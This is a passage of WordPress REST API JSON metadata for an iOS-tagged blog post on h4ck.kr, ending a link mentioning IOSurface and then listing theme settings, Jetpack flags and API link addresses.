IOSurface<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"neve_meta_sidebar":"","neve_meta_container":"","neve_meta_enable_content_width":"","neve_meta_content_width":0,"neve_meta_title_alignment":"","neve_meta_author_avatar":"","neve_post_elements_order":"","neve_meta_disable_header":"","neve_meta_disable_footer":"","neve_meta_disable_title":"","_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[1],"tags":[11],"class_list":["post-3135","post","type-post","status-publish","format-standard","hentry","category-uncategorized","tag-ios"],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3135","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3135"}],"version-history":[{"count":1,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3135\/revisions"}],"predecessor-version":[{"id":3142,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3135\/revisions\/3142"}],"wp:attachment":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3135"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3135"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3135"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}